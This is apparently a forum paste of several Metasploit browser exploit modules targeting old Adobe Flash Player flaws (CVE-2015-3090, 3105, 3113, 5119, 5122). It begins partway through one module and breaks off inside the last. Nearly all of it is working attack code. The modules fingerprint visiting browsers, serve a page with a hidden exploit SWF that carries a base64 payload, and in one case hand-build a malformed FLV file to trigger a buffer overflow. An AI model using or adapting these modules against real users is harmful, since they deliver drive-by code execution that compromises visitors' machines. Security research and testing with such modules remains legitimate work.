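              return true if ver =~ /\A17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
            when 'Linux'
              return true if ver =~ /\A11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end

  # Load the precompiled SWF once, then hand control to the browser exploit
  # server loop provided by the mixin.
  def exploit
    @swf = create_swf

    super
  end

  # Serve one request from a fingerprinted client: the SWF when the URI ends
  # in ".swf", the loader HTML page otherwise.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param request [Rex::Proto::Http::Request] the HTTP request
  # @param target_info [Hash] browser fingerprint collected by the server
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # \z (not $) so a trailing ".swf" is matched only at the very end of the URI.
    if request.uri =~ /\.swf\z/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Render the loader page. The raw payload (base64), a platform id and the
  # fingerprinted OS name are handed to the SWF through FlashVars.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param target_info [Hash] browser fingerprint used to pick the payload
  # @return [Array(String, Binding)] ERB template and the binding to evaluate it in
  def exploit_template(cli, target_info)
    # Random SWF name so the second request is distinguishable and not cached.
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    # NOTE(review): os_name originates from client-side fingerprinting and is
    # interpolated into the FlashVars attribute unescaped; a value containing
    # '&' or '"' would corrupt the attribute. Left unchanged so the SWF keeps
    # receiving exactly the fingerprinted string.
    os_name = target_info[:os_name]

    # Each target declares 'Platform' as the exact id the SWF expects
    # ('win' / 'linux'), so read it from the target instead of re-matching on
    # the target name, which left platform_id nil for any other name.
    platform_id = target['Platform']

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Read the precompiled exploit SWF from the framework data directory.
  # A missing data file raises Errno::ENOENT at exploit start, which is
  # preferable to silently serving an empty body.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
    ::File.binread(path)
  end
end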
 
Adobe Flash Player Drawing Fill Shader Memory Corruption
This Metasploit module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

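class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. The :ua_name and :flash requirement lambdas consult the
  # selected target, so the Windows and Linux gates are evaluated independently;
  # the version upper bounds match the builds the description reports as tested.
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild on June 2015. This module has been tested successfully on:

        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3105'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
          ['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          # \A instead of ^ so the major-version check applies to the whole
          # reported version string rather than to any one line of it.
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /\A17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
            when 'Linux'
              return true if ver =~ /\A11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      # NOTE(review): identical to the date in the CVE-2015-3090 module, while
      # the description says this was exploited in the wild in June 2015 and the
      # bulletin is APSB15-11 — confirm against the bulletin before relying on it.
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end

  # Load the precompiled SWF once, then hand control to the browser exploit
  # server loop provided by the mixin.
  def exploit
    @swf = create_swf

    super
  end

  # Serve one request from a fingerprinted client: the SWF when the URI ends
  # in ".swf", the loader HTML page otherwise.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param request [Rex::Proto::Http::Request] the HTTP request
  # @param target_info [Hash] browser fingerprint collected by the server
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    # \z (not $) so a trailing ".swf" is matched only at the very end of the URI.
    if request.uri =~ /\.swf\z/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  # Render the loader page. The raw payload (base64), a platform id and the
  # fingerprinted OS name are handed to the SWF through FlashVars.
  #
  # @param cli [Rex::Proto::Http::ServerClient] requesting client
  # @param target_info [Hash] browser fingerprint used to pick the payload
  # @return [Array(String, Binding)] ERB template and the binding to evaluate it in
  def exploit_template(cli, target_info)
    # Random SWF name so the second request is distinguishable and not cached.
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    # NOTE(review): os_name originates from client-side fingerprinting and is
    # interpolated into the FlashVars attribute unescaped; a value containing
    # '&' or '"' would corrupt the attribute. Left unchanged so the SWF keeps
    # receiving exactly the fingerprinted string.
    os_name = target_info[:os_name]

    # Each target declares 'Platform' as the exact id the SWF expects
    # ('win' / 'linux'), so read it from the target instead of re-matching on
    # the target name, which left platform_id nil for any other name.
    platform_id = target['Platform']

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  # Read the precompiled exploit SWF from the framework data directory.
  # A missing data file raises Errno::ENOENT at exploit start, which is
  # preferable to silently serving an empty body.
  #
  # @return [String] raw SWF bytes
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
    ::File.binread(path)
  end
end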
 
Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

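# Module metadata: description, references, payload constraints, browser
# requirements and targets. BrowserExploitServer evaluates the
# BrowserRequirements lambdas against the detected client before anything is served.
#
# Fix: the Flash-version patterns anchor on a literal dot (/^18\./, /^17\./, /^11\./).
# The unescaped `.` in the pasted listing matched any character, so a malformed
# version string such as "18x" passed the pattern and then raised from
# Gem::Version.new instead of being rejected.
#
# @param info [Hash] module info merged via update_info
def initialize(info={})
  super(update_info(info,
    'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
    'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'Unknown', # Exploit in the wild
        'juan vazquez' # msf module
      ],
    'References' =>
      [
        ['CVE', '2015-3043'],
        ['CVE', '2015-3113'],
        ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
        ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
        ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
        ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
        ['URL', 'http://bobao.360.cn/learning/detail/357.html']
      ],
    'Payload' =>
      {
        'DisableNops' => true
      },
    'Platform' => ['win', 'linux'],
    'Arch' => [ARCH_X86],
    'BrowserRequirements' =>
      {
        :source => /script|headers/i,
        :arch => ARCH_X86,
        :os_name => lambda do |os|
          os =~ OperatingSystems::Match::LINUX ||
          os =~ OperatingSystems::Match::WINDOWS_7 ||
          os =~ OperatingSystems::Match::WINDOWS_81
        end,
        # IE and Firefox on Windows, Firefox only on Linux; `return` here leaves the lambda.
        :ua_name => lambda do |ua|
          case target.name
          when 'Windows'
            return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
          when 'Linux'
            return true if ua == Msf::HttpClients::FF
          end

          false
        end,
        # Vulnerable Flash builds per platform: the pattern pins the major version,
        # the Gem::Version comparison bounds the build. 17.0.0.169 and 11.2.202.457
        # are excluded — presumably the builds fixed by the referenced APSB15-06.
        :flash => lambda do |ver|
          case target.name
          when 'Windows'
            return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
            return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
          when 'Linux'
            return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
          end

          false
        end
      },
    'Targets' =>
      [
        [ 'Windows',
          {
            'Platform' => 'win'
          }
        ],
        [ 'Linux',
          {
            'Platform' => 'linux'
          }
        ]
      ],
    'Privileged' => false,
    'DisclosureDate' => 'Jun 23 2015',
    'DefaultTarget' => 0))
end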

# Pre-builds the two static resources once; on_request_exploit serves them from
# the instance variables on every request. Then hands control to the server loop.
def exploit
  @flv = create_flv
  @swf = create_swf
  super()
end

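# Serves the three resources the attack needs: the landing HTML, the SWF and the FLV.
#
# Dispatch is on the URI suffix with a literal dot (/\.swf$/, /\.flv$/); the pasted
# listing had an unescaped `.`, which matches any character. The no-cache headers
# keep the browser from reusing a previously fetched copy.
#
# @param cli the connected client
# @param request the HTTP request; only .uri is inspected
# @param target_info [Hash] browser-detection results, forwarded to exploit_template
def on_request_exploit(cli, request, target_info)
  print_status("Request: #{request.uri}")

  if request.uri =~ /\.swf$/
    print_status('Sending SWF...')
    send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
    return
  end

  if request.uri =~ /\.flv$/
    print_status('Sending FLV...')
    send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
    return
  end

  # Anything else gets the landing page, rendered from the ERB template and binding.
  print_status('Sending HTML...')
  send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end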

# Builds the landing page that embeds the exploit SWF.
#
# Returns an ERB template together with the Binding it has to be rendered in:
# the template reads the locals swf_random, b64_payload, platform_id and os_name
# through <%= %>, so those local names are part of the contract and must not be
# renamed (rendering presumably happens in send_exploit_html).
#
# @param cli the connected client; forwarded to get_payload
# @param target_info [Hash] browser-detection results; only :os_name is read
# @return [Array(String, Binding)] ERB source and the binding to evaluate it in
def exploit_template(cli, target_info)
# Random SWF name per request (4-6 letters); on_request_exploit answers any *.swf URI.
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
# The payload travels in the `sh` FlashVar; base64 keeps it attribute-safe.
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

# `pl` FlashVar; stays nil (rendered as an empty string) for any other target name.
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end

# NOTE(review): values are interpolated into the markup unescaped; os_name comes
# from client-side detection, so an odd value could break the attribute quoting.
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

# Loads the pre-built exploit SWF shipped with the framework data for CVE-2015-3113.
#
# @return [String] raw SWF bytes (ASCII-8BIT); raises Errno::ENOENT if the file is missing
def create_swf
  swf_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
  ::File.binread(swf_path)
end

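# Builds the malformed FLV that the SWF feeds to the Nellymoser decoder.
#
# Layout (integers big-endian, as in the FLV container format):
#   header    : "FLV", version 1, flags 0x04 (audio only), DataOffset 9
#   body      : PreviousTagSize 0, one audio tag, trailing PreviousTagSize
#   audio tag : TagType 8, DataSize, TimeStamp 0x1a, TimeStampExtended 0, StreamID 0,
#               then one format byte 0x68 (SoundFormat 6 = Nellymoser, SoundRate 2,
#               SoundSize 0, SoundType 0) followed by 0x440 bytes of 0xee.
#
# Fixes against the pasted listing: the byte escapes had lost their backslashes
# ("x68" is three characters, not the byte 0x68), and DataSize is now derived
# from the actual sound-data length (0x441) instead of being hard-coded. Every
# fragment is produced with Array#pack so the result is ASCII-8BIT throughout:
# appending a non-ASCII pack result to a "\xHH" literal — which is UTF-8 when
# the file is evaluated as UTF-8 source — raises Encoding::CompatibilityError.
#
# The trailing PreviousTagSize is 0xeeeeeeee rather than the real tag size; it
# is kept as in the original (presumably part of the trigger) — do not "fix" it.
#
# @return [String] the FLV bytes (ASCII-8BIT), 1117 bytes long
def create_flv
  # 24-bit big-endian field helper (FLV uses UI24 for DataSize, TimeStamp and StreamID)
  uint24 = ->(value) { [value].pack('N').byteslice(1, 3) }

  sound_data = [0x68].pack('C')            # SoundFormat 6 (Nellymoser), SoundRate 2, SoundSize 0, SoundType 0
  sound_data << [0xee].pack('C') * 0x440   # SoundData

  header = 'FLV'.b                         # signature
  header << [1].pack('C')                  # version
  header << [4].pack('C')                  # Flags: TypeFlagsAudio
  header << [9].pack('N')                  # DataOffset: size of this header

  audio_tag = [8].pack('C')                      # TagType (audio)
  audio_tag << uint24.call(sound_data.bytesize)  # DataSize (0x441)
  audio_tag << uint24.call(0x1a)                 # TimeStamp
  audio_tag << [0].pack('C')                     # TimeStampExtended
  audio_tag << uint24.call(0)                    # StreamID, always 0
  audio_tag << sound_data

  body = [0].pack('N')                     # PreviousTagSize (nothing precedes the first tag)
  body << audio_tag
  body << [0xeeeeeeee].pack('N')           # PreviousTagSize, deliberately bogus (see above)

  header + body
end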
end
 
Adobe Flash Player ByteArray Use After Free

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

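# Module metadata: description, references, payload constraints, browser
# requirements and targets. BrowserExploitServer evaluates the
# BrowserRequirements lambdas against the detected client before anything is served.
#
# Fix: the Linux Flash-version pattern anchors on a literal dot (/^11\./). The
# unescaped `.` in the pasted listing matched any character, so a malformed
# version string such as "11x" passed the pattern and then raised from
# Gem::Version.new instead of being rejected.
#
# @param info [Hash] module info merged via update_info
def initialize(info={})
  super(update_info(info,
    'Name' => 'Adobe Flash Player ByteArray Use After Free',
    'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'Unknown', # Someone from HackingTeam
        'juan vazquez', # msf module
        'sinn3r' # msf module
      ],
    'References' =>
      [
        ['CVE', '2015-5119'],
        ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],
        ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
        ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
      ],
    'Payload' =>
      {
        'DisableNops' => true
      },
    'Platform' => ['win', 'linux'],
    'Arch' => [ARCH_X86],
    'BrowserRequirements' =>
      {
        :source => /script|headers/i,
        :arch => ARCH_X86,
        :os_name => lambda do |os|
          os =~ OperatingSystems::Match::LINUX ||
          os =~ OperatingSystems::Match::WINDOWS_7 ||
          os =~ OperatingSystems::Match::WINDOWS_81 ||
          os =~ OperatingSystems::Match::WINDOWS_VISTA ||
          os =~ OperatingSystems::Match::WINDOWS_XP
        end,
        # IE and Firefox on Windows, Firefox only on Linux; `return` here leaves the lambda.
        :ua_name => lambda do |ua|
          case target.name
          when 'Windows'
            return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
          when 'Linux'
            return true if ua == Msf::HttpClients::FF
          end

          false
        end,
        # Vulnerable Flash builds per platform. The Windows branch has no
        # major-version guard on purpose (see the Chrome note); Gem::Version.new
        # raises on a string it cannot parse, so a malformed version aborts here.
        :flash => lambda do |ver|
          case target.name
          when 'Windows'
            # Note: Chrome might be vague about the version.
            # Instead of 18.0.0.203, it just says 18.0
            return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
          when 'Linux'
            return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
          end

          false
        end
      },
    'Targets' =>
      [
        [ 'Windows',
          {
            'Platform' => 'win'
          }
        ],
        [ 'Linux',
          {
            'Platform' => 'linux'
          }
        ]
      ],
    'Privileged' => false,
    'DisclosureDate' => 'Jul 06 2015',
    'DefaultTarget' => 0))
end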

# Loads the SWF once; on_request_exploit serves it from @swf on every request.
# Then hands control to the browser-exploit server loop.
def exploit
  swf_bytes = create_swf
  @swf = swf_bytes
  super()
end

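# Serves the landing HTML and the exploit SWF.
#
# Dispatch is on the URI suffix with a literal dot (/\.swf$/); the pasted listing
# had an unescaped `.`, which matches any character. The no-cache headers keep
# the browser from reusing a previously fetched copy.
#
# @param cli the connected client
# @param request the HTTP request; only .uri is inspected
# @param target_info [Hash] browser-detection results, forwarded to exploit_template
def on_request_exploit(cli, request, target_info)
  print_status("Request: #{request.uri}")

  if request.uri =~ /\.swf$/
    print_status('Sending SWF...')
    send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
    return
  end

  # Anything else gets the landing page, rendered from the ERB template and binding.
  print_status('Sending HTML...')
  send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end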

# Builds the landing page that embeds the exploit SWF.
#
# Returns an ERB template together with the Binding it has to be rendered in:
# the template reads the locals swf_random, b64_payload, platform_id and os_name
# through <%= %>, so those local names are part of the contract and must not be
# renamed (rendering presumably happens in send_exploit_html).
#
# @param cli the connected client; forwarded to get_payload
# @param target_info [Hash] browser-detection results; only :os_name is read
# @return [Array(String, Binding)] ERB source and the binding to evaluate it in
def exploit_template(cli, target_info)
# Random SWF name per request (4-6 letters); on_request_exploit answers any *.swf URI.
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
# The payload travels in the `sh` FlashVar; base64 keeps it attribute-safe.
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

# `pl` FlashVar; stays nil (rendered as an empty string) for any other target name.
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end

# NOTE(review): values are interpolated into the markup unescaped; os_name comes
# from client-side detection, so an odd value could break the attribute quoting.
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

# Loads the pre-built exploit SWF shipped with the framework data for CVE-2015-5119.
#
# @return [String] raw SWF bytes (ASCII-8BIT); raises Errno::ENOENT if the file is missing
def create_swf
  swf_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')
  ::File.binread(swf_path)
end
end
 
Adobe Flash opaqueBackground Use After Free (Hacking Team)

Код:
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::BrowserExploitServer

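# Module metadata: description, references, payload constraints, browser
# requirements and the single Windows target. BrowserExploitServer evaluates the
# BrowserRequirements lambdas against the detected client before anything is served.
#
# Fix: the Flash-version pattern anchors on a literal dot (/^18\./). The
# unescaped `.` in the pasted listing matched any character, so a malformed
# version string such as "18x" passed the pattern and then raised from
# Gem::Version.new instead of being rejected.
#
# @param info [Hash] module info merged via update_info
def initialize(info={})
  super(update_info(info,
    'Name' => 'Adobe Flash opaqueBackground Use After Free',
    'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling the opaqueBackground property
7 setter of the flash.display.DisplayObject class. This module is an early release
tested on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
windows 8.1, Firefox and Adobe Flash 18.0.0.203,
Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
Windows 8.1, Firefox and Adobe Flash 18.0.0.194
},
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'Unknown', # Vulnerability discovered on HackingTeam info leak
        'juan vazquez', # Ported to Msf
        'sinn3r' # Testing and some editing
      ],
    'References' =>
      [
        ['CVE', '2015-5122'],
        ['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
      ],
    'Payload' =>
      {
        'DisableNops' => true
      },
    'Platform' => ['win'],
    'Arch' => [ARCH_X86],
    'BrowserRequirements' =>
      {
        :source => /script|headers/i,
        :arch => ARCH_X86,
        :os_name => lambda do |os|
          os =~ OperatingSystems::Match::WINDOWS_7 ||
          os =~ OperatingSystems::Match::WINDOWS_81
        end,
        # IE or Firefox only; `return` here leaves the lambda.
        :ua_name => lambda do |ua|
          case target.name
          when 'Windows'
            return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
          end

          false
        end,
        # Flash 18.x up to and including 18.0.0.203 (the newest build in the tested list).
        :flash => lambda do |ver|
          case target.name
          when 'Windows'
            return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
          end

          false
        end
      },
    'Targets' =>
      [
        [ 'Windows',
          {
            'Platform' => 'win'
          }
        ]
      ],
    'Privileged' => false,
    'DisclosureDate' => 'Jul 06 2015',
    'DefaultTarget' => 0))
end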

# Loads the SWF once; on_request_exploit serves it from @swf on every request.
# Then hands control to the browser-exploit server loop.
def exploit
  swf_bytes = create_swf
  @swf = swf_bytes
  super()
end

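# Serves the landing HTML and the exploit SWF, refusing one browser/OS pairing.
#
# Windows 8.1 with browser version 11.0 (presumably IE11, which the tested list
# above does not include for 8.1) is answered with a 404 before any resource is
# served. The `.swf` dispatch uses a literal dot (/\.swf$/); the pasted listing
# had an unescaped `.`, which matches any character.
#
# @param cli the connected client
# @param request the HTTP request; only .uri is inspected
# @param target_info [Hash] browser-detection results (:os_name and :ua_ver read here)
def on_request_exploit(cli, request, target_info)
  print_status("Request: #{request.uri}")

  if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
    print_warning("Target setup not supported")
    send_not_found(cli)
    return
  end

  if request.uri =~ /\.swf$/
    print_status('Sending SWF...')
    send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
    return
  end

  # Anything else gets the landing page, rendered from the ERB template and binding.
  print_status('Sending HTML...')
  send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end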

# Builds the landing page that embeds the exploit SWF.
#
# Returns an ERB template together with the Binding it has to be rendered in:
# the template reads the locals swf_random, b64_payload, platform_id and os_name
# through <%= %>, so those local names are part of the contract and must not be
# renamed (rendering presumably happens in send_exploit_html).
#
# @param cli the connected client; forwarded to get_payload
# @param target_info [Hash] browser-detection results; only :os_name is read
# @return [Array(String, Binding)] ERB source and the binding to evaluate it in
def exploit_template(cli, target_info)
# Random SWF name per request (4-6 letters); on_request_exploit answers any *.swf URI.
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
# The payload travels in the `sh` FlashVar; base64 keeps it attribute-safe.
b64_payload = Rex::Text.encode_base64(target_payload)
